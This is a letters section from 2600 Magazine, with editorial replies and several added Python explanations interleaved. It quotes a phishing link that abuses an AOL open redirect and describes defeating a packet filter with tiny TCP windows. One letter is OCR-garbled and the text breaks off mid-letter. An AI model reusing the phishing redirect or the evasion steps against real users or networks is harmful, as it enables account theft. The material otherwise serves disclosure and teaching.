Disturbed by this, I next went to one of the Cingular franchise stores instead of a corporate store like the first one. Again, I simply said I had some questions about my account, gave the woman my cell number, and she pulled up the record and allowed me to look at it. She didn't ask who I was or confirm any account information or the passcode. The only difference was the look of the web-based application she was using, and the fact that she did ask for my zip code when she first punched in the cell number. Recently I found out that the franchise stores now need to put in the last four digits of the SSN to access the account. Still, the passcode is displayed in red for them to see.
I'm really disappointed to see this easy availability of my cell phone records, especially after the scandal last year in which anyone could pay $100 to get a call history through pretexting. I didn't even have to pretext to get this info. I could've been anyone going into the stores and giving them any phone number since they didn't verify my identity. Then I could've called customer support with the passcode that I could see onscreen and do whatever I wanted.
The big question is why does an in-store sales rep even need access to accounts that have already been set up? Their job is to sell and activate new phones. They could still accept bill payments without having access to existing customer accounts. Allowing in-store sales reps to have account access is much less secure than having that info available only in a call center. For one, the interaction isn't being recorded, and the store reps are open to bribing, whereas call center reps are much less likely to be able to accept bribes due to logistical reasons.
On the Cingular webpage they state:
"As you may have read or seen in the media, a number of web sites are advertising the availability for sale of wireless phone records. Please know that Cingular Wireless does not sell customer information to, or otherwise cooperate with, these companies, and we are working aggressively to combat their practices.... Cingular is supporting efforts to criminalize the unauthorized acquisition or sale of wireless phone records. In addition, Cingular has a variety of safeguards in place to protect against unauthorized access to customer information, and we continue to evaluate and enhance these safeguards. If you wish to better protect your account from unauthorized access, contact us at 1-866-CINGULAR (1-866-246-4852) and ask that a passcode be placed on your account."
Well, they can start the criminal investigation with their own in-store sales people.
As a side note, I also saw a small colored graph of some kind on my account's main page, which indicated how much revenue I brought in relative to other customers. I asked the rep what it was and that's when he got uptight and said I wasn't even supposed to be looking at the computer. I guess this graph tells call center reps how valuable I am as a customer.
Dave
As long as there are human beings in the equa
tion, security holes like this are going to exist in one
form or another. Education, not automation, is the
answer.
Dear 2600:
I am 18 years old and have been a reader for many years. There aren't any meeting places close to me so I have never been able to attend. Today I received my letter of acceptance to the University of Florida. When I was reading the meeting place page I was really excited when I saw that there is a meeting on the UF campus. Now I can't wait until August. Thanks for such a great read!
Kevin
Many college applicants choose their college
based on whether or not there's a 2600 meeting
nearby. It makes perfect sense to us.
Dear 2600:
I recently renewed a domain name. I called the company instead of dealing with it online due to complications that I won't go into. I received a teller who was located in the Philippines. I ended up calling this company three times. The first and last calls were dealt with through the Philippines office and the second call was through a main office in Pennsylvania.
The domain name was to be paid for by an author I work with. The teller in Pennsylvania wanted to speak with the author in order for the renewal to be processed whereas the teller in the Philippines bypassed this and simply called me with the number they had on record to verify I was affiliated with the account on record after I answered the phone.
The number they had on record was for a landline account that forwards calls to my mobile. I found this an interesting mini-system that verified trust between myself and this lady in the Philippines. It also showed me (as I've experienced many times before with telecommunications companies) the policy inconsistencies within the same company scattered around regions from one side of the planet to the other.
Somehow in some bizarre way this relates to why I get so many requests from Philippine girls at Friendster, which is why I even bother keeping the account open!
JZ
Danger
Dear 2600:
I recently received an email that was an obvious phishing attempt. The email asked me to log into my Neteller account. The problem is, I don't have a Neteller account. I've received many of these types of emails in the past asking me to log into my account with a company I don't have an account with, but this one was different. I inspected the link that was sent in the email. I was surprised to see that the link started with www.aol.com. Many users unfamiliar with phishing might lose their account in this type of phishing attempt because of the familiar www.aol.com address. This phishing attempt uses a redirect feature conveniently provided by AOL. At this time I am unable to explain the extensive use of numbers and commas.
http://www.aol.com/ams/clickThruRedirect.adp?1073762100,2147779757%D72147568413,https://202.143.132.179/www.neteller.com/index.html
As of this writing the AOL redirect is still working. Simply change the link after the last comma and you can redirect to any page you like.
So, you ask, what is the problem? The problem comes when a malicious user wants to phish for AOL accounts. If a malicious user sets up an AOL type login page, this type of attack could be very successful.
I emailed admin@aol.com regarding this issue and, as expected, received no response. Hopefully by providing the information to the masses the security issue will eventually be resolved.
dNight
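The letter's observation is that the redirector takes whatever follows the last comma as its destination and follows it, which is the classic open-redirect pattern. The following is an added example, not code from the letter or from AOL: it extracts the destination from a link built like the one above (the numeric fields are placeholders, the target is the one the letter quotes) and shows the check a hardened redirector would apply before following it. The allow-list of hosts is an assumption.

```python
"""Added example (not from the letter or AOL): pull the target out of a
clickThruRedirect-style link and decide whether a redirector should follow it.

The letter's observation is that everything after the last comma is the
destination. The numeric fields in the sample link are placeholders, and the
allow-list is an assumption about what a redirector on aol.com should accept."""
from urllib.parse import urlsplit

# Constructed sample modeled on the phishing link quoted in the letter.
PHISH_LINK = ("http://www.aol.com/ams/clickThruRedirect.adp?"
              "1073762100,2147779757,"
              "https://202.143.132.179/www.neteller.com/index.html")

# Assumed allow-list: domains the redirector may send users to.
ALLOWED_HOSTS = ("aol.com",)


def redirect_target(link):
    """Return the destination encoded in the link: the text after the last comma."""
    query = urlsplit(link).query
    return query.rsplit(",", 1)[-1]


def host_allowed(host, allowed=ALLOWED_HOSTS):
    """Exact match or subdomain of an allowed domain; 'aol.com.evil.example' fails."""
    if not host:
        return False
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)


def is_safe_redirect(target, allowed=ALLOWED_HOSTS):
    """Accept same-site absolute paths and http(s) URLs on allowed hosts only."""
    if "\\" in target or any(c in target for c in "\r\n\0"):
        return False  # browsers treat '/\' like '//'; CR/LF/NUL enable header tricks
    parts = urlsplit(target)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, and friends
    if parts.netloc:
        # urlsplit keeps 'user@host' in netloc; .hostname drops the userinfo, so
        # 'https://www.aol.com@evil.example/' is judged by 'evil.example'.
        return host_allowed(parts.hostname, allowed)
    # No host at all: must be a plain absolute path on this site, not '//host'.
    return target.startswith("/") and not target.startswith("//")


def follow_or_refuse(link, allowed=ALLOWED_HOSTS):
    """What a hardened redirector would do: the target, or None to refuse."""
    target = redirect_target(link)
    return target if is_safe_redirect(target, allowed) else None


if __name__ == "__main__":
    print(redirect_target(PHISH_LINK), "->", follow_or_refuse(PHISH_LINK))
```

The point of `follow_or_refuse` is that the fix is on the redirector, not on the user: the same link that fooled people because it started with www.aol.com is refused because its destination host is not one the site vouches for.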
Dear 2600:
I'm not exactly sure if this letter is relevant... But I thought this was so stupid I had to mention it... Congress is trying to pass a law called the Animal Enterprise Terrorism Act (AETA) and it has one very very very serious problem. If this law were to pass it would make legal activities such as peaceful protests, consumer boycotts, media campaigns, legislative proposals, or even telling the public what happens in puppy mills, factory farms, or canned hunting facilities, able to be classified as acts of terrorism. Whatever happened to free speech? The right of peaceful protest? Sure, this really has nothing to do with hacking. But it does deal with suppression of our basic rights. So I thought I'd write in a small letter about it because I believed if anyone would be open minded enough to care, they'd probably read this magazine.
ch3rry
This was signed into law on November 27, 2006.
Regardless of whether you believe that this will crim
inalize free speech or whistleblowing, it seems a bit
of a reach to inject the word "terrorism" into this
topic. That right there should have been enough to
derail this.
Weirdness
Dear 2600:
Has anyone else received anything like this? It appears to be some sort of garbled rant about technology... but the attached image [mutually.gif] at the bottom has maku.ob on it... which is the trading symbol for makeup.com limited. I am guessing this is just a way to bypass spam filters. Any thoughts?
---------- Forwarded message ----------
From: Ambrose Hartman <clyh@resourceaz.com>
Date: Dec 4, 2006 2:16 AM
Subject: Punch-card ballots, optical-scan ballots,
and absentee ballots are all subject to question.
We all use it for the same thing, talking, communicating, and connecting. Their intent is also to launch attacks against major companies, and now attack each other. What have they and their parents learned from everything?
My phone works perfectly for what I do.
The only fault with this near utopian situation is that computers never, ever, ever, act the way we want them to.
Computers are popping up everywhere, the world is becoming wireless, and now you can do almost everything online. This all has me completely sick of elections.
drlecter
This is apparently the latest craze in spam. Text is grabbed from websites, online books, news stories, and even weather reports and then sent out in an email to various people. Most spam detectors won't catch this since the text appears to be legitimate. The spam is then included in attachments (image files, hence the term "image spam"), which people to this day still open blindly.
Advice Sought
Dear 2600:
We're a group of young hacktivists from Canada and we are going to be starting our own printed mag. We're going to be breaking ground with some top notch articles and I'm sure a few of our articles will mention 2600. When they do, I'll email you again to let you know, as we would love to reference and tell people about your mag. Here's the thing: I am interested in hearing a short story about how 2600 got started and put on the stands all over. Any tips? Thanks in advance for the advice.
Alexander Chase
It sure wouldn't be a short story. The thing about starting a magazine is that it takes a really long time to develop from scratch. We began very small and grew to a size we were comfortable with. That's the most important bit of knowledge we can share with any new publication. If you start too big, you will burn yourselves out and go broke in the process. That's assuming you aren't already big with lots of money to invest. But then you're not really a zine. The key is patience and determination, coupled with a good dose of insanity. We wish you luck and look forward to seeing what you come up with.
Following Up
Dear 2600:
I just realized upon Googling my past screen names that a letter I wrote a while ago was published in your magazine but I didn't receive my free subscription! This is probably because I stopped checking my last email address and moved on to other emails.
Marcio
It's also probably because we don't offer free subscriptions for letters. Look at how many letters we get! We would go bankrupt extremely fast. We offer free subscriptions for articles, which generally go into far more detail than letters. However, if you were to send us a two paragraph article and expect a free subscription for that (as many do), it would likely get converted into a letter if it were to get printed at all.
Dear 2600:
Just a quick update to the article "Hacktivism in the Land Without a Server." I've heard from someone who went all the way through that you'll have to enter a non-zero quantity in the form of a javascript variable or Paypal refuses to carry out the transaction. However, $0.01 is enough to satisfy it.
\8/
Dear 2600:
This is directed towards Dale Thorn regarding his article "Algorithmic Encryption Without Math."
It's good that you've taken an interest in cryptography and I hope you will continue and learn. With that in mind, this is not intended as an attack. I too invented "brilliant" encryption schemes in my youth only to eventually learn that good encryption is hard for a reason. I'm not an encryption expert, but someone like Bruce Schneier is unlikely to respond to you because he's seen these classic mistakes a gazillion times, so you're stuck with me.
I'm working from your description, rather than your code. Let's see, where to begin?
One Time Pads (OTP) are considered unbreakable because there is no determinable relationship between the clear text and the cipher text as long as it's only used once. Hence, One Time Pad. The reason one time pads are not commonly used is that the pad must be securely delivered through separate channels. This can be a PITA. Your approach of generating a pseudo random transposition array requires that the recipient also have the array via similar PITA channels, plus by using it more than once, you negate its potential value as a One Time Pad. All pain, no gain!
Your reference to using other parameters, such as filenames, to foil predictability is good. This is called a "salt." The purpose of a salt is to defeat "Rainbow Tables." Without a salt, one can pre-generate billions of possible clear text to encrypted text relationships in advance over a period of months or years so that when you need to actually break a message, a simple lookup into your Rainbow Table can break it in seconds because the brute force was already done in advance. Even with a salt, it has to be done right to be fully effective. Microsoft got it wrong with their Office line, so you're in good company. Last but not least on the subject of salt, the security it brings is strictly aimed at Rainbow Tables. It does not add to the effective key space, i.e., make encryption stronger, because by its nature the salt is a known and knowable value.
Now to the heart of your approach: You've defined a transposition function via your pseudo random array such that:
CLEARTEXT_A -> TRANSPOSITION_1 ->
Let's stick with upper case English for ease of discussion. So you may have something like this:
"A" -> TRANSPOSITION_1 -> "X"
"?" -> TRANSPOSITION_1 -> "N"
This is a valid encryption scheme. It even has a name. It's called a Caesar cipher. It dates back to at least the time of Julius Caesar and is what most puzzle books use for fun these days. Now to be fair, you can work in a larger space than A to Z, but that's a simple linear growth that will make it awkward for humans with pencil and paper, but isn't a significant key space difference.
Your next addition is to support multiple level encrypted encryptions with TRANSPOSITION_2, TRANSPOSITION_3, TRANSPOSITION_n. You state that it is necessary to know each transposition (password or passnumber) and the order they were used so that it can be reversed. That's incorrect as far as the attacker is concerned. You use this information as a straightforward way to reverse your algorithm and decrypt. However, the attacker could care less about your passwords and order. He only needs to break the cipher, and that's not the same thing!
The reason is because there exists a TRANSPOSITION_x that is the result of all of your previously applied transpositions. In mathematical terms, this is called a group. The net effect is that multiple level encryptions in your technique add absolutely nothing to the encryption security.
Let's continue the above example by running it through two more layers of your encryption.
Password 2
"X" -> TRANSPOSITION_2 -> "F"
"N" -> TRANSPOSITION_2 -> "?"
Password 3
"F" -> TRANSPOSITION_3 -> "M"
"?" -> TRANSPOSITION_3 -> "G"
Now where you would reverse "M" to "F" to "X" to get "A" because you know the sequence and the keys, as the attacker, I'm left with the following puzzle:
"A" -> TRANSPOSITION_x -> "M"
"?" -> TRANSPOSITION_x -> "G"
This is the same Caesar cipher as before! The transposition array is unknown, but it was unknown before so multiple encryptions added nothing to the security. It's still just a Caesar cipher! By breaking it, I implicitly produce the TRANSPOSITION_x array that you never actually used, but is the mathematical equivalent of your n-level encryptions, but all in one step.
Again, please don't take this as an attack. I've lost track of the number of things I've invented only to discover I'd been beaten to it, sometimes by hundreds of years. Learn and get better.
Dave
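Dave's argument is that the composition of any number of keyed letter substitutions is itself a single substitution, so an attacker never needs the passwords or their order. The following is an added example, not Dale Thorn's code and not Dave's: it builds one shuffled-alphabet table per password (how a password becomes a table is an assumption here; the article's scheme is, strictly, a monoalphabetic substitution, which the letter calls a Caesar cipher), stacks three of them, and shows that a known-plaintext attacker recovers the combined TRANSPOSITION_x table directly and decrypts with it.

```python
"""Added example (not Dale Thorn's code, nor Dave's): stacked keyed letter
substitutions collapse into one substitution that a known-plaintext attacker
recovers directly, without any password or ordering.

How a password becomes a "transposition array" is an assumption: shuffle the
alphabet with a PRNG seeded from the password."""
import random
import string

ALPHABET = string.ascii_uppercase


def table_for(password):
    """Assumed construction of TRANSPOSITION_n from a password."""
    rng = random.Random(password)
    letters = list(ALPHABET)
    rng.shuffle(letters)
    return dict(zip(ALPHABET, letters))


def apply(table, text):
    """Substitute each upper-case letter; leave everything else alone."""
    return "".join(table.get(c, c) for c in text)


def apply_all(tables, text):
    """The article's n-level encryption: tables applied in order."""
    for t in tables:
        text = apply(t, text)
    return text


def invert(table):
    return {v: k for k, v in table.items()}


def compose(tables):
    """TRANSPOSITION_x: the single table equal to applying `tables` in order."""
    return {c: apply_all(tables, c) for c in ALPHABET}


def recover_table(plaintext, ciphertext):
    """Known-plaintext attack on any monoalphabetic substitution.

    Pairs letters position by position. Needs neither the passwords nor the
    order they were applied in; an inconsistent pair would mean the cipher is
    not a simple substitution at all."""
    table = {}
    for p, c in zip(plaintext, ciphertext):
        if p in ALPHABET:
            if table.get(p, c) != c:
                raise ValueError("inconsistent pair: not a monoalphabetic substitution")
            table[p] = c
    return table


def demo():
    tables = [table_for(pw) for pw in ("first", "second", "third")]
    crib = "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG"  # constructed; covers A-Z
    ct = apply_all(tables, crib)
    composite = compose(tables)
    recovered = recover_table(crib, ct)
    return {
        "layers_match_composite": apply(composite, crib) == ct,
        "attacker_recovers_composite": recovered == composite,
        "decrypts_without_keys": apply(invert(recovered), ct) == crib,
    }


if __name__ == "__main__":
    print(demo())
```

Whatever the number of layers, the attacker's key space is the 26! tables of one substitution, and with a long enough crib (or ordinary frequency analysis) that table is recovered in one step, as Dave says.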
Dear 2600:
I would like to add another technique to Tokachu's article "The Not-So-Great Firewall of China." This is a technical solution which should work for all network connections. It also doesn't require any modification of the TCP/IP software on the other end of the link, nor does it require any thought from the user once it's set up. Since the Chinese firewall is completely stateless, it won't catch a "forbidden word" which is split across multiple packets. The most reliable way to do this is to make your data packets really, really small. To make the remote computer send small TCP segments, tell your kernel to advertise a small window. On Linux, for example, this can be done with setsockopt(socket, getprotobyname("tcp")->p_proto, TCP_WINDOW_CLAMP, &winsize, sizeof(int)) where winsize is an integer variable (not a constant!) containing the window size which you want to advertise, in bytes. The tcp(7) manpage says that "the [Linux] kernel imposes a minimum [window] size of SOCK_MIN_RCVBUF/2", defined to be 256 in kernel include/net/sock.h. In any case, changing that line from 256 to 2 should be sufficient.
The most efficient strategy is to advertise a window one byte less than the shortest forbidden string you plan on using. Of course, using a ridiculously small window size comes with some penalties. Each five (or whatever) bytes of data will come with its own IP header (24 bytes) and TCP header (24 bytes). Further, every such segment must be acknowledged by the receiving end before the sender is allowed to send any more data, creating a round-trip delay. Assuming a window of five bytes, this inflates a three kilobyte (3072 byte) transmission into 615 round trips, requiring the sender to transmit 32,592 bytes and the receiver to transmit 29,520 bytes of acknowledgments, not including initial and final handshaking (SYN/FIN). The largest penalty, however, comes from the over 600 round trip times that have to pass for the transfer to complete, a slight increase over the less than ten round trips which would be required for the same transmission using larger (~1024 byte) segments.
I would also like to shill for the Museum of Communications (http://www.museumofcommunications.org/, +1 206 767 3012) in Seattle. They have what is probably the best collection of telephone equipment in the world. It's also one of the best places to blue box - the docents most likely won't object, so long as you don't break anything. They'd probably even be glad to help you, though don't expect to be able to dial outside. If you ask nicely you can read their amazingly comprehensive library of Bell System Practices. They've got multiple switches: a Number 1 Crossbar, a Number 5 Crossbar, a marginally functioning Number 3 ESS, and a rare Panel switch.
Duncan Smith
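The technique in the letter above rests on two things: a per-packet matcher cannot see a string that straddles segments, and a tiny window costs a round trip per segment. The following is an added example, not code from the letter: it models the segmentation a clamped window induces by slicing a constructed byte stream into window-sized pieces, runs both a per-packet matcher and a reassembling one over the pieces, derives the "one byte less than the shortest forbidden string" window, and reproduces the letter's overhead arithmetic (615 round trips, 32,592 and 29,520 bytes for 3072 bytes at a 5-byte window). The header sizes default to the letter's 24+24 figures, which are not RFC minimums, and the stream and forbidden word are constructed.

```python
"""Added example (not from the letter): what per-packet string matching sees
when a stream is delivered in window-sized segments, and the cost of doing so.

Segmentation is modeled by slicing a constructed byte stream into chunks of
`window` bytes, standing in for the segments a peer sends once this host has
advertised a small window with TCP_WINDOW_CLAMP. Header sizes default to the
letter's figures (24-byte IP, 24-byte TCP), which are not RFC minimums."""
import math

# Constructed sample stream and forbidden string.
STREAM = b"Weather today: mild. Tonight's topic is FORBIDDEN and unrelated chatter follows."
FORBIDDEN = b"FORBIDDEN"


def segments(stream, window):
    """Chop a byte stream into segments of at most `window` bytes."""
    if window < 1:
        raise ValueError("window must be at least one byte")
    return [stream[i:i + window] for i in range(0, len(stream), window)]


def per_packet_match(segs, needle):
    """A stateless inspector: looks inside each segment on its own."""
    return any(needle in seg for seg in segs)


def stream_match(segs, needle):
    """A reassembling inspector: matches across segment boundaries.
    This is the failure mode of the technique: against such a box the
    small window buys nothing but the overhead."""
    return needle in b"".join(segs)


def safe_window(forbidden_strings):
    """The letter's rule: one byte less than the shortest forbidden string,
    so no single segment can hold a whole one, whatever the alignment."""
    return min(len(s) for s in forbidden_strings) - 1


def overhead(data_len, window, ip_hdr=24, tcp_hdr=24):
    """Segments (one round trip each when the window holds one segment),
    bytes from the sender (data plus headers) and from the receiver (one
    header-only ACK per segment). Handshake segments are not counted."""
    n = math.ceil(data_len / window)
    hdr = ip_hdr + tcp_hdr
    return {"round_trips": n, "sender_bytes": data_len + n * hdr, "receiver_bytes": n * hdr}


if __name__ == "__main__":
    w = safe_window([FORBIDDEN])
    segs = segments(STREAM, w)
    print(w, per_packet_match(segs, FORBIDDEN), stream_match(segs, FORBIDDEN))
    print(overhead(3072, 5), overhead(3072, 1024))
```

`stream_match` is the check a practitioner should run before relying on this: a filter that reassembles the TCP stream (or simply buffers a few segments) sees the word regardless of window size, and the only lasting effect is the round-trip penalty that `overhead` quantifies.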
Dear 2600:
"How to Get Around Cable/DSL Lockdowns" in 23:4 is mostly on the right track - you can indeed send SMTP from your ISP-hosted e-mail account through your home machine while on the roam using the method described (for most cable/DSL providers). You may even have good results in the short term. However, I wouldn't recommend it as a reliable long-term method for three reasons:
1) While it's true that many ISPs block inbound connections to port 25 of their dynamic subscriber IP pool, it's also true that (increasingly) many of them also block outbound connections from their dynamic IP pool to port 25 of remote hosts other than the ISP's SMTP servers. What that means is that your home SMTP server may or may not be able to deliver mail to remote hosts, depending on whether your ISP blocks those outbound connections. This isn't because your ISP is run by totalitarian bastards (although it may be); they're trying to keep spambots from using their (and your) bandwidth. Thank them for this.
2) Most of the major spam filters out there (e.g., SpamAssassin) will assign a much higher score to any message relayed from a dynamic IP address. Most distributed spambot networks are running on unsecured home computers with dynamic IPs. What that means is that even if you think your message has been delivered, the receiver's spam filter may have dropped it on the floor because of the originating IP address. (This is true even if you're using a dynamic DNS server to give yourself a tidy-looking A record.)
3) On a related note, if you're sending from youraddress@example.org and example.org has a registered SPF record in DNS, your odds of getting through spam filters are diminished still further. As an example, ADELPHIA.NET has SPF set up as follows:
$ dig adelphia.net txt
;; ANSWER SECTION:
adelphia.net. 41456 IN TXT "v=spf1 ip4:68.168.78.0/24 ip4:68.168.75.0/24 -all"
What that means is that if you aren't in one of the two IP blocks listed above, you aren't authorized to send mail from *@adelphia.net, and any spam filter that checks SPF (which is increasingly common) is more likely to score your message as spam. (Sadly, Comcast just bought Adelphia, and it seems they either haven't heard of SPF yet or they can't keep track of their acquisitions fast enough to be bothered to keep an up-to-date SPF record for COMCAST.NET. See "totalitarian bastards" above.)
What to do? One of two things:
1) Configure your SMTP server to use one of your ISP's SMTP servers as a smart host. (In your Microsoft SMTP setup, go under Delivery > Advanced and enter your cable/DSL provider's SMTP server as your smart host. Do not check the box to attempt direct delivery first.) You'll then be relaying through your ISP's mail system and won't need to worry about any of the three things above.
2) Scrap the whole scheme and connect to your ISP's webmail service over HTTPS. That's why it's there.
Live long and hack on.
McViking
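Point 3 in the letter above is exactly the evaluation a receiving filter performs: it takes the connecting IP and walks the sender domain's SPF record left to right until a mechanism matches or the terminal "all" decides. The following is an added example, not code from the letter: it embeds the adelphia.net record quoted above as a constructed string (no DNS is queried) and evaluates a candidate sending IP against it. Only ip4/ip6 mechanisms and "all" are implemented; mechanisms and modifiers that require DNS lookups (include, a, mx, ptr, exists, redirect=) are refused explicitly rather than guessed, and the result names follow RFC 7208.

```python
"""Added example (not from the letter): evaluate an SPF record against a
connecting IP, as a receiving filter does before scoring a message.

The record is the adelphia.net TXT quoted in the letter, embedded as a
constructed string; no DNS is queried. Only ip4/ip6 mechanisms and the
terminal "all" are implemented. Anything needing DNS (include, a, mx, ptr,
exists, redirect=) raises instead of guessing."""
import ipaddress

ADELPHIA_SPF = "v=spf1 ip4:68.168.78.0/24 ip4:68.168.75.0/24 -all"

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
NEEDS_DNS = ("include", "a", "mx", "ptr", "exists")


def check_spf(record, sender_ip):
    """Return pass / fail / softfail / neutral / none / permerror for sender_ip."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"  # not an SPF record at all
    try:
        ip = ipaddress.ip_address(sender_ip)
    except ValueError:
        return "permerror"
    for term in terms[1:]:
        if "=" in term:  # modifier such as redirect= or exp=
            raise NotImplementedError(f"modifier {term!r} needs DNS")
        qual = "+"  # an unqualified mechanism means pass on match
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name == "all":
            return QUALIFIERS[qual]  # "-all" is the hard fail in the letter
        if name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            if ip.version == net.version and ip in net:
                return QUALIFIERS[qual]
            continue  # no match: try the next mechanism
        if name in NEEDS_DNS:
            raise NotImplementedError(f"mechanism {term!r} needs DNS")
        return "permerror"  # unknown mechanism
    return "neutral"  # no 'all' and nothing matched


def relayed_from_home_ok(record, home_ip):
    """The letter's scenario: would mail sent straight from a home IP pass?"""
    return check_spf(record, home_ip) == "pass"
```

A dynamic cable address such as 24.0.0.1 (constructed here) gets "fail" from the adelphia.net record, which is what the letter means by diminished odds; only the two listed /24s pass, so relaying through the ISP's own smart host is the fix, not a prettier reverse DNS name.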
This raises a point among those of you who send us email from wacky places. Please be sure to not do something that's likely to anger a spam filter because there's often little way for us to detect it. That means avoiding the above, not using spam-like phrases ("make money fast!"), or sending weird attachments with no corresponding text.
Dear 2600:
I was kind of disappointed that I sent you a high resolution picture of a payphone in Queens, New York and haven't even received any type of response.
Troy
We've been meaning to set up an auto-responder on the payphones@2600.com address to acknowledge receipt of submissions. But you should also know that we're looking for foreign payphones and, although Queens is the most multicultural county in all of the United States, it doesn't qualify as foreign. And there is certainly nothing exotic or mysterious about Verizon.
Gratitude
Dear 2600:
As a listener to Off The Hook and subscriber to 2600, I've been aware for a long time of how helpful you folks are. Recently I found another example while looking at the web page of my girlfriend's college:
"Need some assistance even quicker? Then you can call the Help Desk at extension 2600 from on campus, or from off campus at (800) xxx-xxxx, x2600."
Glad you're there to help her out!
Barry
It would be fun to gather a list of the various offices/people that different extension 2600s connect to in various places. More fun if we can inspire people in charge to always assign that extension to something interesting.
Dear 2600:
| am a 1 5-year-ol d sophomore h i gh school
student. I am a very fai thfu l and l oyal reader of 2600
and I woul d l i ke to l et you know some thi ngs that
your magazi ne has accompl i shed i n my l i fe. When
| was about 1 . years ol d my father came to me and
sai d somet hi ng al ong the l i nes of "Al ex' I found
a ' hacker' magazi ne at Borders whi l e l ooki ng at
s ome PC ones . I know you ' re i nterested i n that ki nd
of stuff so I got i t for you - here. " I was absol utel y
t hr i l l ed t o actual l y see a magazi ne about my mai n
i nterest. Si nce then, your magazi ne has never fai l ed
to i nspi re and moti vate me. For exampl e, | started to
t i nker wi t h el ectroni c devi ces and use packet s ni ffers
Page 42
2600 Magazine
to get a better understandi ng of how I nternet i nterac
t i on rea l l y works - a l l at the age of 1 4. I have gone so
far between these two to three years that I ' m amazed
that i t even happened. Si nce the 2600 wri ters
usua l l y use techn i cal l anguage to such a degree, i t
forces you to di g i n and fi nd out what they rea l l y
mean. Thi s is exactl y what I di d and it turned out
to be a l i ttl e humorous because your magazi ne was
a bi t too advanced for a 1 4-year-ol d to understand.
I constantl y read books and art i cl es on computers
and, more speci fi cal l y, hardware, networki ng, proto
col s, packets, l ockpi cki ng, red boxi ng, etc. I t has j ust
been such an extraordi nary j ourney these years that
I fel t compel l ed to wri te a l etter to you guys prai s i ng
your efforts for freedom of the mi nd and i ndi vi dual ,
pri vacy, and how we shoul d never stop our thi rst
for knowl edge and our cur i osi ty about the worl d
i n general . I have l earned much s i nce my fi rst copy
and I wanted to tel l you guys to not stop whatever
you are doi ng. And yes, I do real i ze the hardshi ps
we are goi ng through today concerni ng the absol ute
paranoi a and abusi veness of the general publ i c and
the government themsel ves about the mer e word
" hacker. " So, a l l i n a l l , t hank you guys for doi ng such
a great j ob and keep i t real .
Tr4/\!ce
And after reading all of the various horror stories
involving parents, you must realize that you're quite
lucky to have a father who supports your curiosity
We spend a lot of time pointing out the bad things
around us so it's especially important to acknowl
edge the exceptions.
Thoughts
Dear 2600:
I've been reading your journal for about two years. I am not a hacker, but probably could be with some spare time and the right resources.
My interest is mainly in the philosophy of 2600 and its concern with privacy, computer users' rights, and the corporate machines that invade privacy using services as a lure to log onto domains. Third party tracking is, in my book, corporate hacking of my personal computer. If I were doing the same to Google as they appear to have the right to do to me, I would in all probability be arrested. As a result, I ignore whatever they spew at me as far as marketing goes, partly because I'm vindictive, but more importantly because it isn't relevant to all my particular circumstances. Thus, I believe, the desire to create the big new crystal ball is a profoundly foolish idea, and the losers are small online retailers and local services who think Google is helping. But is it really?
We hear so much disinformation about everything that marketing information about marketing is merely propaganda. My prediction: online retail will build, but will also destroy, sectors of the economy. Is there a depression looming?
skoobedy
Dear 2600:
First, let me get my nose brown here by saying your magazine is excellent.
Now that that's out of the way, I'm a 44-year-old male who did phreak back in the 1980s (using 950 numbers to call long distance BBSes) so I'm not squeaky clean here, but that was a youthful digression.
Having said that, I feel you are hypocrites. I'll explain: You say that hacking (or using vulnerabilities) in the system shouldn't be for gain. But in 23:2, you printed a letter from Zen master who wanted to know how to "hack into 'Fastpass' machines" at Disney World. Yet, two pages before, you had a letter from Jeff who was replying to an earlier letter to Jack whose father wouldn't let him subscribe to 2600 because of the word "hacking." Jeff said to let Jack's father read the magazine. If I was Jack's father and saw the letter from Zenmaster, that would reinforce my beliefs about hacking, thereby perpetuating the myth about hackers being bad people. There are a lot of closed minds out there. We need to open them, not add dead bolts.
Computer Bandit
You generally don't open closed minds by keeping your mouth shut. And it would be wrong for us to restrict knowledge and tell people not to ask certain questions because there was no seemingly legitimate reason for asking. As far as we're concerned, there is always a legitimate reason: curiosity. And while we're not kidding ourselves into believing that there aren't lots of people with ulterior motives who could also benefit from such knowledge, if we help others learn how things work we're doing what we set out to do. Some parents get that. Many sadly don't. But we can't change who we are in order to appeal to people who don't like who we are. There's too much of that in our culture already.
Dear 2600:
For several months now, a company has been running radio advertisements for their Identity Theft Protection Service (http://www.lifelock.com). Presumably they contact the major credit bureaus and place a call first lock on obtaining any new credit. This is all fine and dandy. As far as I know you can contact them yourself and do the same without trusting some third party company to protect your personal information.
The commercial has some dude saying: "My name is Blah Blah and my SSN is 123-45-6789..." and goes on to have a testimonial from another stating that they did not think the service would amount to anything when one night they got a call asking if they were applying for credit someplace....
The problem I see is that obtaining credit is not the only reason someone would want your identity. What about people seeking employment under assumed names? As I see it nobody puts a lock on what is reported to the IRS and Social Security. Presumably those agencies can detect fraud by noticing the filings are either somehow incorrect
Spring 2007Page 43
where the name does not match the SSN and/or the address is different. But what about intentional acts intended to attack the individual? Let's say someone looks up the dude's address and verifies the name and SSN match this guy, uses a valid taxpayer ID number for, let's say, their least loved company (i.e., Walmart), and files a 1099 to the IRS, state treasury, and his actual residence. How is this guy and the target company going to prove this is an incorrect filing? How would you feel if you received a 1099 that does not withhold any taxes stating that you had earned $20 million this past year contracting for a company you didn't?
What a mess!
Exo
We'll likely get a whole lot of mail from accountants who will explain how this all works. We find the LifeLock approach interesting. On their website, the CEO of the company posts his real Social Security Number as proof of how secure he feels with their product. It almost sounds like a challenge....
Dear 2600:
This is a response to anybody out there who thinks that hacking MySpace is a worthy pastime. I ask what purpose is there in this? There isn't any useful knowledge to be gained. As far as I can tell, the only information about me that can be gleaned by getting my password is maybe a password. No SSN, no financial credit. And also, why are they using the portal pages? That was something I thought about doing a long time ago when I didn't know what ethical hacking was, or was just bored. If people wanted to know more about MySpace, then do it in a manner that doesn't bloat my bulletins with silly posts about free ringtones. My two cents.
psion
Anytime someone says there isn't worthwhile information to be found in pursuing something, someone else always manages to come along and prove them wrong. The fact is that any bit of information we give up about ourselves is potentially a gateway to a whole lot of other information. That's why protecting anything that's private is so important and if there's a way of defeating this on any level, we need to know about it.
Dear 2600:
I recently saw the following posted in MySpace:
